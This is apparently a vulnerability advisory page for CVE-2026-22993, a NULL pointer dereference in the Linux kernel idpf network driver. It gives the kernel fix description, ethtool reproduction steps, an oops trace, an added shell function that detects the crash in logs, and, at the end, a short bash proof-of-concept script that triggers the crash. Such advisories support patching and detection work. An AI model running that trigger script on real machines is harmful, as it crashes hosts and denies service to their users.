Security Vulnerability Report
CVE-2026-22993 CVSS 5.5 MEDIUM

CVE-2026-22993

Published: 2026-01-23 16:15:55
Last Modified: 2026-04-02 12:16:19
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

idpf: Fix RSS LUT NULL ptr issue after soft reset

During soft reset, the RSS LUT is freed and not restored unless the interface is up. If an ethtool command that accesses the rss lut is attempted immediately after reset, it will result in NULL ptr dereference. Also, there is no need to reset the rss lut if the soft reset does not involve queue count change.

After soft reset, set the RSS LUT to default values based on the updated queue count only if the reset was a result of a queue count change and the LUT was not configured by the user. In all other cases, don't touch the LUT.

Steps to reproduce:

** Bring the interface down (if up)
ifconfig eth1 down

** update the queue count (eg., 27->20)
ethtool -L eth1 combined 20

** display the RSS LUT
ethtool -x eth1

[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000
[82375.558373] #PF: supervisor read access in kernel mode
[82375.558391] #PF: error_code(0x0000) - not-present page
[82375.558408] PGD 0 P4D 0
[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI
<snip>
[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]
[82375.558786] Call Trace:
[82375.558793] <TASK>
[82375.558804] rss_prepare.isra.0+0x187/0x2a0
[82375.558827] rss_prepare_data+0x3a/0x50
[82375.558845] ethnl_default_doit+0x13d/0x3e0
[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180
[82375.558886] genl_rcv_msg+0x1ad/0x2b0
[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10
[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10
[82375.558937] netlink_rcv_skb+0x58/0x100
[82375.558957] genl_rcv+0x2c/0x50
[82375.558971] netlink_unicast+0x289/0x3e0
[82375.558988] netlink_sendmsg+0x215/0x440
[82375.559005] __sys_sendto+0x234/0x240
[82375.559555] __x64_sys_sendto+0x28/0x30
[82375.560068] x64_sys_call+0x1909/0x1da0
[82375.560576] do_syscall_64+0x7a/0xfa0
[82375.561076] ? clear_bhb_loop+0x60/0xb0
[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e
<snip>
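
A log check for the crash signature in the trace above, as an added example that is not part of the CVE record or the kernel patch: it reports a NULL pointer dereference only when the faulting RIP is in idpf_get_rxfh. The names find_idpf_rss_oops and sample_log are assumptions, and the second oops in the sample input is constructed to show a non-match.

```shell
#!/bin/sh
# Added example (not from the CVE record): detect the CVE-2026-22993 crash
# signature in kernel log text, e.g. saved dmesg or journalctl -k output.

# Reads log text on stdin. Prints "<timestamp> idpf_get_rxfh" for each NULL
# pointer dereference whose faulting RIP is in idpf_get_rxfh.
# Exit status: 0 if at least one match was found, 1 otherwise.
find_idpf_rss_oops() {
    awk '
        # Start of a NULL-deref report: remember its kernel timestamp.
        /BUG: kernel NULL pointer dereference/ {
            armed = 1
            ts = "unknown"
            if (match($0, /\[ *[0-9]+\.[0-9]+\]/)) {
                ts = substr($0, RSTART + 1, RLENGTH - 2)
                sub(/^ +/, "", ts)
            }
            next
        }
        # The first RIP line after it names the faulting function.
        armed && /RIP: [0-9a-f]+:/ {
            if ($0 ~ /RIP: [0-9a-f]+:idpf_get_rxfh\+/) {
                print ts " idpf_get_rxfh"
                hits++
            }
            armed = 0
        }
        END { exit (hits > 0 ? 0 : 1) }
    '
}

# Sample input: the first oops uses lines from the trace on this page; the
# second oops (example_other_func) is constructed and must not be reported.
sample_log() {
    cat <<'EOF'
[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000
[82375.558373] #PF: supervisor read access in kernel mode
[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI
[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]
[82375.558786] Call Trace:
[82375.558804] rss_prepare.isra.0+0x187/0x2a0
[90000.000001] BUG: kernel NULL pointer dereference, address: 0000000000000008
[90000.000002] RIP: 0010:example_other_func+0x10/0x40 [example]
EOF
}

sample_log | find_idpf_rss_oops
```

On a host, feed the function saved kernel log text on stdin; the exit status makes it usable as a check in a monitoring script.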

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:* - VULNERABLE
Linux kernel < fixed version (see the fix commit on git.kernel.org for the exact version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2026-22993 PoC - Trigger NULL pointer dereference in idpf driver
INTERFACE=${1:-eth1}
echo "[+] Triggering CVE-2026-22993: idpf RSS LUT NULL ptr dereference"

# Step 1: Bring interface down
ifconfig "$INTERFACE" down
echo "[*] Interface $INTERFACE brought down"

# Step 2: Update queue count
ethtool -L "$INTERFACE" combined 20
echo "[*] Queue count updated to 20"

# Step 3: Display RSS LUT - This triggers the NULL pointer dereference
ethtool -x "$INTERFACE"
echo "[!] If you see this, the bug may not trigger on this system"
